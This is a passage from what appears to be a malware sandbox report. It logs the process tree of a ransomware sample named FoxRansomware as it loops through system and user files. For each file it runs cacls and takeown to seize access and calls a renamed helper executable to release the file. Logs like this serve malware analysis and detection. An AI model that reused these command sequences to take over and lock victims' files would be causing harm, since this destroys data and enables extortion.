C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵
- Modifies file permissions
PID:736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵PID:3980
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin""2⤵PID:5500
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin" /E /G Admin:F /C3⤵PID:5256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin"3⤵PID:4764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000004.bin" -nobanner3⤵PID:4892
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000004.bin" -nobanner4⤵PID:5900
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3412
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin""2⤵PID:5588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin" /E /G Admin:F /C3⤵PID:276
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin"3⤵PID:6060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000000H.bin" -nobanner3⤵PID:4276
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000000H.bin" -nobanner4⤵PID:1584
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin""2⤵PID:4648
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin" /E /G Admin:F /C3⤵PID:1044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin"3⤵
- Modifies file permissions
PID:1096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000000S.bin" -nobanner3⤵PID:5572
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000000S.bin" -nobanner4⤵PID:5824
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin""2⤵PID:5704
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin" /E /G Admin:F /C3⤵PID:3320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin"3⤵
- Modifies file permissions
PID:3720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000016.bin" -nobanner3⤵PID:304
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000016.bin" -nobanner4⤵PID:5772
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin""2⤵PID:212
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin" /E /G Admin:F /C3⤵PID:1688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin"3⤵PID:5188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000050.bin" -nobanner3⤵PID:5792
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000050.bin" -nobanner4⤵PID:5856
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.bbbc4dbb-277a-4bc1-ba22-a91fe24b3e36.1.etl""2⤵PID:4392
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.bbbc4dbb-277a-4bc1-ba22-a91fe24b3e36.1.etl" /E /G Admin:F /C3⤵PID:5436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.bbbc4dbb-277a-4bc1-ba22-a91fe24b3e36.1.etl"3⤵PID:5776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "NotificationUxBroker.bbbc4dbb-277a-4bc1-ba22-a91fe24b3e36.1.etl" -nobanner3⤵PID:5396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "NotificationUxBroker.bbbc4dbb-277a-4bc1-ba22-a91fe24b3e36.1.etl" -nobanner4⤵PID:4804
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:3004
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:5904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵PID:2216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "overlay.png" -nobanner3⤵PID:5384
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "overlay.png" -nobanner4⤵PID:5424
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1340
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵PID:4940
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:5784
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵PID:2152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:5140
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵PID:2796
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1240
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:6116
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:5640
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵PID:6104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "tasks.xml" -nobanner3⤵PID:5960
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "tasks.xml" -nobanner4⤵PID:1480
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5276
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat""2⤵PID:2808
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C3⤵PID:5432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat"3⤵
- Modifies file permissions
PID:1948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "StorageHealthModel.dat" -nobanner3⤵PID:6000
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "StorageHealthModel.dat" -nobanner4⤵PID:1544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml""2⤵PID:5520
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml" /E /G Admin:F /C3⤵PID:5568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml"3⤵PID:440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner3⤵PID:4544
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner4⤵PID:6092
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5964
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml""2⤵PID:3236
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml" /E /G Admin:F /C3⤵PID:316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml"3⤵PID:2916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner3⤵PID:5788
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner4⤵PID:3708
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml""2⤵PID:4416
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml" /E /G Admin:F /C3⤵PID:3756
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml"3⤵
- Modifies file permissions
PID:1564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "ThemeSettings2013.xml" -nobanner3⤵PID:3324
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "ThemeSettings2013.xml" -nobanner4⤵PID:5340
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin""2⤵PID:3556
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin" /E /G Admin:F /C3⤵PID:3320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin"3⤵
- Modifies file permissions
PID:3720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000006S.bin" -nobanner3⤵PID:964
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000006S.bin" -nobanner4⤵PID:5868
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin""2⤵PID:5160
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin" /E /G Admin:F /C3⤵PID:1688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000076.bin"3⤵PID:5188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000076.bin" -nobanner3⤵PID:4928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000076.bin" -nobanner4⤵PID:3700
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin""2⤵PID:5724
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin" /E /G Admin:F /C3⤵PID:5048
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007G.bin"3⤵PID:3792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000007G.bin" -nobanner3⤵PID:5164
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000007G.bin" -nobanner4⤵PID:4804
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:376
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin""2⤵PID:3676
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin" /E /G Admin:F /C3⤵PID:5272
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin"3⤵PID:2372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000007Q.bin" -nobanner3⤵PID:4528
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000007Q.bin" -nobanner4⤵PID:2236
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5604
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin""2⤵PID:6016
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin" /E /G Admin:F /C3⤵PID:5784
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin"3⤵PID:2152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000008F.bin" -nobanner3⤵PID:5372
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000008F.bin" -nobanner4⤵PID:2796
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin""2⤵PID:2512
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin" /E /G Admin:F /C3⤵PID:3436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin"3⤵PID:736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000095.bin" -nobanner3⤵PID:5024
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000095.bin" -nobanner4⤵PID:3128
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin""2⤵PID:6116
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin" /E /G Admin:F /C3⤵PID:5256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin"3⤵PID:2248
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "000000A0.bin" -nobanner3⤵PID:5596
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "000000A0.bin" -nobanner4⤵PID:6000
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.47f218bb-2167-405f-a4e8-07715739cb59.1.etl""2⤵PID:4832
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.47f218bb-2167-405f-a4e8-07715739cb59.1.etl" /E /G Admin:F /C3⤵PID:2804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.47f218bb-2167-405f-a4e8-07715739cb59.1.etl"3⤵PID:4496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MoUsoCoreWorker.47f218bb-2167-405f-a4e8-07715739cb59.1.etl" -nobanner3⤵PID:768
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MoUsoCoreWorker.47f218bb-2167-405f-a4e8-07715739cb59.1.etl" -nobanner4⤵PID:5716
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin""2⤵PID:4776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin" /E /G Admin:F /C3⤵PID:5612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin"3⤵PID:5872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000005.bin" -nobanner3⤵PID:4404
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000005.bin" -nobanner4⤵PID:5920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin""2⤵PID:4436
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin" /E /G Admin:F /C3⤵PID:5280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin"3⤵PID:5244
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000000I.bin" -nobanner3⤵PID:5340
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000000I.bin" -nobanner4⤵PID:3552
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1820
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin""2⤵PID:292
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin" /E /G Admin:F /C3⤵PID:288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin"3⤵PID:5868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "0000000T.bin" -nobanner3⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "0000000T.bin" -nobanner4⤵PID:5736
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin""2⤵PID:280
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin" /E /G Admin:F /C3⤵PID:5008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin"3⤵
- Modifies file permissions
PID:4148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "00000017.bin" -nobanner3⤵PID:4168
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "00000017.bin" -nobanner4⤵PID:4920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin""2⤵PID:2648
-
